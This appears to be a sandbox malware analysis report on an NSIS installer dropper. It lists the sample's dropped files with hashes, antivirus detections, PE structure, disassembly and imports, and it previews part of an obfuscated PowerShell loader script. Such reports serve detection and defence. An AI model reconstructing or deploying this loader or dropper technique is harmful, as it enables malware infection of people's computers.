                                                                                                                                                                          Preview:$drmmendes=$Strikning;........$Genanskaffelsesvrdiers = @'.Scr m.Anaca$IncomVSemiriUnwoonPrewogNaz peCon is PintpEn rei Arbed rundsSta l=Verni$ BrdgMSopraoE tertUd.onoTilkbrOrloveEfterr JaunnSp raeUni,fnTranssBlokbu nprbMisu,mHemipiTidsbsHimmes Medai titto erenPoesi;Doct . Hitlf SideuForpunUn,bjcUddeltMenteifriezo TendnUnpr, SoliW irlamrk,vlTipspeForzirProbl Motor(St,km$Val,tEPaatalDelageS xadc FiretAstror TartoDigynnUndereFrem ua.bortgenerrAfsona estelSeismi Somnt Fejlypanth,H.per$SelsrJGuslairegi tOutwonUdsteeBrochuRegrirRaa,r) Stor .kyn{ olyt.K nce.Neut $StiklUChrysbo tfee eelihRag seHemicf ego.tConi,e On cdU,gpiemedia Trafi(.ringROpride saanbJup trLos neZymoseCh.fmdUndfaiAfsiknAudiegNo rh besta'HypnaIFe telSt,knt.odris radtMikse$ Sp iT.rrana Un xnForlit arbe,KatteEKamme ShmeAThymonDemanhFrem.oLungwllank SMuletl R tib Conge Perin OvereAgar UPhot dSpla.s L,mma FairgEnt mcRheolUpaatedDi lh TemplaClarin SekutUnc v PradhSBr.gecAgnanhUnder.Defe rReanaC Nalor,ekkoaFdevacOverfk Rek

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Brnaba.txt

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:Generic INItialization configuration [registrar aabredden]
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):357
                                                                                                                                                                          Entropy (8bit):4.322293998459369
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6:PLZOEA1KHK56RTYPCl0ic0BTgcNDuARfKQfOwVBbvmF00aLdT4F+6/EB+OHeWhkb:P8HnPel/PMARfKnwVBbvmAhT4F+6TIkb
                                                                                                                                                                          MD5:ACED15FD55D311D663ECC7B5F386B8E2
                                                                                                                                                                          SHA1:A7F36FD33206209CB0E5E39643EC8C6773D5ED3B
                                                                                                                                                                          SHA-256:16FDDF0D82AA1263194FE7C92459A6CF21DDDB1F1AE5A4E5A099865DB126614F
                                                                                                                                                                          SHA-512:7F27A00EDA246719E5F8FA521AC9499002DFDB36F6E661E13797C863520D84D14F43B5F717B176BBBEFCB4B62B671A14292C59DF288C55628CA08868BBCCFBD3
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[bloodstained initialdeterminanten]..unprescinded produktionsforholds identific dysurias biblioteksbgernes textman kaldte spotlightet archearl,sofus unvessel souffleer cementblanders stoneweed rufe trningsdragternes genitivisk bartizaned....[registrar aabredden]..;teardowns batchkrselens unform gradgrind,eksekveringens afskrifters secretors printerporte..

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Considered188.Bir

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):348384
                                                                                                                                                                          Entropy (8bit):7.639034171049347
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:dyfPRKaSNCVG2cTS6Q1tkVPNhc2olqXezTsWDdilXtd:dqsGGMeNCWXePJDdiZ
                                                                                                                                                                          MD5:A1A4353FD27981B35FE7B52E89E44403
                                                                                                                                                                          SHA1:24AA8E6DD6379047634FB430C0B5DD0D82BF7E92
                                                                                                                                                                          SHA-256:A6EED1C6BAE46D80F20E7B3D16C676D3F1A1D59D27460C47FB7A4FF40FD691EF
                                                                                                                                                                          SHA-512:A3F7F0BDA2E1BBA7883C47B1AA5E721602F0E7E26289F5135362DAE1B2F02ED27EFCE26716CC560CA6622560BB2C947DF8C2FAB6C63CC46EB9A57B0CA7360064
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:......DD................rrr...@@...SSSS...............................uu......~~...3................W...........rr..11..........B.........uuuu..........................U....R.........ll.F.........lll..DD.==...................................0.r...%........]........W......................................7.........c.........T....====..................................>>>>>..... ."..L....tttt.......-.((...]...S..~.........o..-......l...................-.....r....%%...........7..&.ZZ...[.........X.........................................2.&........................+....##.......CC...........q..l.66...............//..o.._.....................vvvvvv...RR..................$........1..................r................&.........\..XX..9...ww........8..eeee..3...0......g.h...........M....((.22..|.............XX...0........................e.......O.............ff...................S...........W........II...[.j.ll.G...........i.......+.....=......................44.................88.........QQ....

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\Unloveliest183.jpg

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 79x629, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7357
                                                                                                                                                                          Entropy (8bit):7.91945978739656
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:LqBD2cMKYD6M3QJxtEns0OU16nK3HXJ2UgU:eBDnM6MgDtEEUknqYUL
                                                                                                                                                                          MD5:F32B2F6007A74312B5F0CB1AA5B26680
                                                                                                                                                                          SHA1:BC3DC7EB50EFA53CE2FC46A32C5F995048BD85B3
                                                                                                                                                                          SHA-256:2CB79365771956854ACEAD63102B019737F5C99A5A10DA94D2969638CC23E825
                                                                                                                                                                          SHA-512:EBE3120E79D07F3D1D775940ADF00E099AFD6F3273D49C2D600FEE1ACE2C175C9E01CBE9EB3D83EF7D033F129C5D562983F19B1D7CD327763A92E9A246EB94F3
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......u.O.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...J).8V.".. ..)...OQM......8P).sH..K.p...L...M..M..N..S.U......G.,..T.9....u4........H......R.LZ.U.X.*E...*..Gc.|\.P.EI.sY.sh....QH..@.[.Q..#.z..R.9.ED.jQZ"Y".*5.2...TT.c..T.1..+.....E.S.sR6*.....).s.R.F.(.Q,.:..8..T.*.E... .PU..T3D8.tc.9W.O.~Q.RP...-5....IzT.Q..TV..L.1VTT1....Q...E.1S....4.c.SR..).?tj.).......8..Z....8."N-{T.*$...R0.,.*......}.Q".>.Sq.

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\blinkenberg.txt

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):188
                                                                                                                                                                          Entropy (8bit):4.482002609682535
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:jNgLDK9OujIcBAVar8kQWgQQXTzMTBWAQ2qQJCTgLck/xLCmSoTKA9jsqdn:WEOnwfoOVm0tnNwTOdg295dn
                                                                                                                                                                          MD5:2B51E420AA9188A74DB9D853C1225B5C
                                                                                                                                                                          SHA1:B1AA913BBE9C576F1C7917AE2E18F4F5C4B54164
                                                                                                                                                                          SHA-256:FA760065782306B4B9E082086166D25EADA402A3332C771C48F4EDE9D5DC7E53
                                                                                                                                                                          SHA-512:574581B87211289CC809F0BF97E968E5BC070C95B20E92ADC4315404A3E632754291BBE3B3AF1894441855BD25C797FF52ADF968DC0A73F710F199017CAF37E6
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:benittas thirstier inductometer.Halvlngde forlyder roth..Cicuta barbaren udsugningsanlggets,privatisere rationalizing protogyny udmntningsprofil gyrolith volkswagen..[tyndtarmes sstykke]..

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\fllesbrn.txt

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:Generic INItialization configuration [FJORTENAARSFDSELSDAGES UDSTDELSERNES]
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):279
                                                                                                                                                                          Entropy (8bit):4.994626166298632
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6:2/r0IwOQPFeBmRaaBO/XJLgDj/GZowKblJBQVAL6Ab9xu+b1:2A9OQYYJO/XuGZjKJJiVu6AbT5R
                                                                                                                                                                          MD5:6620E9C5C35F1FEAAFC525A49FF31080
                                                                                                                                                                          SHA1:969AB64F04BCDCAB9088F1F2FA6A8209DB33E8FD
                                                                                                                                                                          SHA-256:FCD285BFF12244DA3CF356243BEACEB8DB8B2868320D371D1059408AD02A0CAA
                                                                                                                                                                          SHA-512:A3238FD4843C3407CD07C014444F2557D7064F53A074F58BE97230A7CC7D81E0C7D09DD25B9110C5568466E2F9AA10EB11129ED143E07F63763EB5FE3DA75ED9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[PALEOMAGNETISM CLADOCEROUS]..praseodymium undeftly vestenvindes.Nskesedlers forgrundsfarves spandaueren skrmmevaabnets....;toyos oddesund apostrofe fremfrelses.Opsamlingsbeholdere alkoholdebut unadvertised suggestioneres overprovide......[FJORTENAARSFDSELSDAGES UDSTDELSERNES]..

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\sensible.jpg

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 424x693, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):32639
                                                                                                                                                                          Entropy (8bit):7.9475019669336495
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:6+UnjpGM4h/Q0kf7jWCXOi/vWYjc/Gv33xxMatfqxi/fftvoEP:6+UjpB4K0kjjWKOi/vWYjOUHXtfqAXvP
                                                                                                                                                                          MD5:86647E5BC7C82F155C5CB0EC05F40E9F
                                                                                                                                                                          SHA1:E0946F26733AA05FCEAE067377622C083AF88C8D
                                                                                                                                                                          SHA-256:6D1974E15C49647F2BA907D7D233CB04D2F9D9C77CFB6B4255B577FE95D54B19
                                                                                                                                                                          SHA-512:7C812D119382C9135195DDD18106FC6B465982D36C7815680C52DE2C0A40DC8E569FFBF32E87AF8BA10A71670A01CAB30D0D36CE49DB599473EC10CDACEFF992
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........H.O..,Q.1..x...t.S.:P8<S...Hb.M(...t..x.R..........4.(..\....J^{R.....N....H...c.>..l.(f.@.u..$&$.U.Q.8..Lt..I..L.%ii...m..N..........R.sU..Ez..L..<S.q.V..s...=..)2^....0.<6{T.8..?.p.Tc..NOZ....?<sP.....O....H....j }..G. '\dsN.....H.}MIC..=...ii.....(.{.....Z..t4.(.v}...n....1E<c.z@8.v2i..8......zR......i......m...q.!.(?.?g.....M..t...E+

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):509800
                                                                                                                                                                          Entropy (8bit):7.588494641400243
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:mQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZf:AEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2H
                                                                                                                                                                          MD5:0425118557AA95EA418A0B15DD072078
                                                                                                                                                                          SHA1:9C09BDBE6282DB2E5D6D55456DF456100C133E33
                                                                                                                                                                          SHA-256:567C3776AFCD2C7DFB3B07E4C6DD281C0DCDC770ED2827C9A84CCCAF3FE97D6C
                                                                                                                                                                          SHA-512:6DBCA6B67D56860B9F1D53D7FB4C3D5C6844336D6D5878D643C4D70448089D6BC219CA546C206230AE9F044EECA6E0506D76513209DA9A00F4F1702289D06C82
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                          • Antivirus: Virustotal, Detection: 72%, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@..........................................................................s.......`..P...........`................................................................p...............................text...jZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc...P....`.......v..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe:Zone.Identifier

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Entropy (8bit):7.588494641400243
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:uPDwUy9ewY.exe
                                                                                                                                                                          File size:509'800 bytes
                                                                                                                                                                          MD5:0425118557aa95ea418a0b15dd072078
                                                                                                                                                                          SHA1:9c09bdbe6282db2e5d6d55456df456100c133e33
                                                                                                                                                                          SHA256:567c3776afcd2c7dfb3b07e4c6dd281c0dcdc770ed2827c9a84cccaf3fe97d6c
                                                                                                                                                                          SHA512:6dbca6b67d56860b9f1d53d7fb4c3d5c6844336d6d5878d643c4d70448089d6bc219ca546c206230ae9f044eeca6e0506d76513209da9a00f4f1702289d06c82
                                                                                                                                                                          SSDEEP:12288:mQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZf:AEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2H
                                                                                                                                                                          TLSH:16B4F1B3B6C6F5A6E5150CF4CD298EF9A3A2EC02C9D9020BB5947F5E78B313345150AE
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:371f9d96cb0d1703

                                                                                                                                                                          Static PE Info

                                                                                                                                                                          General

                                                                                                                                                                          Entrypoint:0x4030b8
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x52BA66A9 [Wed Dec 25 05:01:29 2013 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:e160ef8e55bb9d162da4e266afd9eef3

                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                          Signature Issuer:CN=Scoliid, E=Nonprophetic@Ezekiel.Di, O=Scoliid, L=Petersburg, OU="Servitor Schenkels ", S=New York, C=US
                                                                                                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                          Error Number:-2146762487
                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                          • 29/08/2024 11:36:51 29/08/2025 11:36:51
                                                                                                                                                                          Subject Chain
                                                                                                                                                                          • CN=Scoliid, E=Nonprophetic@Ezekiel.Di, O=Scoliid, L=Petersburg, OU="Servitor Schenkels ", S=New York, C=US
                                                                                                                                                                          Version:3
                                                                                                                                                                          Thumbprint MD5:81B7CD62136CC0356CDF14966785C227
                                                                                                                                                                          Thumbprint SHA-1:947D32228436A9DAE09A8911CEB912D3FE4483D7
                                                                                                                                                                          Thumbprint SHA-256:36518F28D3E9AC7ED381310574D9BBEE40417FDB060DD00F1136ACEC57734850
                                                                                                                                                                          Serial:6EC066A3A1BED47218ACBC540F5D6AD12D206890

                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                          Instruction
                                                                                                                                                                          sub esp, 00000184h
                                                                                                                                                                          push ebx
                                                                                                                                                                          push ebp
                                                                                                                                                                          push esi
                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                          push edi
                                                                                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                                                                                          mov dword ptr [esp+10h], 00409190h
                                                                                                                                                                          mov dword ptr [esp+20h], ebx
                                                                                                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                          call dword ptr [00407034h]
                                                                                                                                                                          push 00008001h
                                                                                                                                                                          call dword ptr [0040711Ch]
                                                                                                                                                                          push ebx
                                                                                                                                                                          call dword ptr [0040728Ch]
                                                                                                                                                                          push 00000008h
                                                                                                                                                                          mov dword ptr [00423778h], eax
                                                                                                                                                                          call 00007F3A70ADF80Ah
                                                                                                                                                                          mov dword ptr [004236C4h], eax
                                                                                                                                                                          push ebx
                                                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                                                          push 00000160h
                                                                                                                                                                          push eax
                                                                                                                                                                          push ebx
                                                                                                                                                                          push 0041EC80h
                                                                                                                                                                          call dword ptr [00407164h]
                                                                                                                                                                          push 00409180h
                                                                                                                                                                          push 00422EC0h
                                                                                                                                                                          call 00007F3A70ADF4B4h
                                                                                                                                                                          call dword ptr [00407120h]
                                                                                                                                                                          mov ebp, 00429000h
                                                                                                                                                                          push eax
                                                                                                                                                                          push ebp
                                                                                                                                                                          call 00007F3A70ADF4A2h
                                                                                                                                                                          push ebx
                                                                                                                                                                          call dword ptr [00407118h]
                                                                                                                                                                          cmp byte ptr [00429000h], 00000022h
                                                                                                                                                                          mov dword ptr [004236C0h], eax
                                                                                                                                                                          mov eax, ebp
                                                                                                                                                                          jne 00007F3A70ADCA7Ch
                                                                                                                                                                          mov byte ptr [esp+14h], 00000022h
                                                                                                                                                                          mov eax, 00429001h
                                                                                                                                                                          push dword ptr [esp+14h]
                                                                                                                                                                          push eax
                                                                                                                                                                          call 00007F3A70ADEF32h
                                                                                                                                                                          push eax
                                                                                                                                                                          call dword ptr [00407220h]
                                                                                                                                                                          mov dword ptr [esp+1Ch], eax
                                                                                                                                                                          jmp 00007F3A70ADCB35h
                                                                                                                                                                          cmp cl, 00000020h
                                                                                                                                                                          jne 00007F3A70ADCA78h
                                                                                                                                                                          inc eax
                                                                                                                                                                          cmp byte ptr [eax], 00000020h
                                                                                                                                                                          je 00007F3A70ADCA6Ch

                                                                                                                                                                          Rich Headers

                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                          Data Directories

                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x18a50.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x7c0600x708
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                          Sections

                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x5a6a0x5c008781c451557a4626018483faabe438d0False0.6614724864130435data6.417713695663469IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x70000x11ce0x1200640f709ec19b4ed0455a4c64e5934d5eFalse0.4520399305555556OpenPGP Secret Key5.23558258677739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0x90000x1a7b80x400c9a433d4fe67308d6a5942cfb667cbe7False0.5986328125data4.862130355383113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .ndata0x240000x120000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .rsrc0x360000x18a500x18c00ae1da6d52c6b9db5a72bcee2295c6945False0.3393604008838384data4.6330392279203245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                          Resources

                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          RT_ICON0x364480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.2523660238968414
                                                                                                                                                                          RT_ICON0x46c700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4220954356846473
                                                                                                                                                                          RT_ICON0x492180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.49343339587242024
                                                                                                                                                                          RT_ICON0x4a2c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.5876865671641791
                                                                                                                                                                          RT_ICON0x4b1680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.5450819672131147
                                                                                                                                                                          RT_ICON0x4baf00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.7319494584837545
                                                                                                                                                                          RT_ICON0x4c3980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.7811059907834101
                                                                                                                                                                          RT_ICON0x4ca600x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.47804878048780486
                                                                                                                                                                          RT_ICON0x4d0c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.7095375722543352
                                                                                                                                                                          RT_ICON0x4d6300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6879432624113475
                                                                                                                                                                          RT_ICON0x4da980x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.5551075268817204
                                                                                                                                                                          RT_ICON0x4dd800x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 0EnglishUnited States0.6086065573770492
                                                                                                                                                                          RT_ICON0x4df680x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.6993243243243243
                                                                                                                                                                          RT_DIALOG0x4e0900x100dataEnglishUnited States0.5234375
                                                                                                                                                                          RT_DIALOG0x4e1900x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                          RT_DIALOG0x4e2b00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                          RT_DIALOG0x4e3780x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                          RT_GROUP_ICON0x4e3d80xbcdataEnglishUnited States0.601063829787234
                                                                                                                                                                          RT_VERSION0x4e4980x2b0dataEnglishUnited States0.5058139534883721
                                                                                                                                                                          RT_MANIFEST0x4e7480x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

                                                                                                                                                                          Imports

                                                                                                                                                                          DLLImport
                                                                                                                                                                          KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
